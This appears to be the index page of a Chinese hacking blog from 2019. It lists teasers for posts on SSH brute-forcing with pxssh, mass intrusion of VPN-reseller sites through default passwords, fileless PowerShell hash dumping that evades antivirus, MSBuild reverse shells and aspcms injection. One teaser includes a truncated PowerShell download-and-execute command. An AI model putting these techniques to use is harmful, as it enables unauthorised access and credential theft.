裤衩哥的小屋

2019-03-31

# 利用python-pxssh实现ssh爆破

利用python-pxssh实现ssh暴力破解,昨天的文章中完成了利用pexpect来执行登录ssh的操作,今天利用pxssh来进行暴力破解,pxssh是一个在pexpect库中的专用脚本,不需...

2019-03-31

# 批量入侵免流网站(多为阿里云腾讯云等服务器)

上一篇文章说篇幅太少,其实操作就那样,没必要一步一步的说明,有的朋友给我发邮件私聊了下,很简单就复现了。接下来正文,之前发现某些免流脚本,都是默认密码,数据库管理都是phpmyadmin,lnm...

2019-03-31

# 绕过杀毒执行ps-实现无文件落地导hash

绕过杀毒执行ps-实现无文件落地导hash直接执行。三款国内杀毒只有360拦截了执行。powershell "IEX (New-Object Net.WebClient).DownloadStr...

2019-03-31

# Msbuild 利用reverse-shell

Msbuild 利用reverse-shellmsbuild简介:Microsoft Build Engine是一个用于构建应用程序的平台。 该引擎(也称为MSBuild)为控制构建平台如...

2019-03-29

# 自动注入脚本aspcms利用

自动注入脚本aspcms利用本来是个师傅共享在ichunqiu的,结果因为编码转码问题用的是py3写的。原文链接:https://bbs.ichunqiu.com/forum.php?mod=v...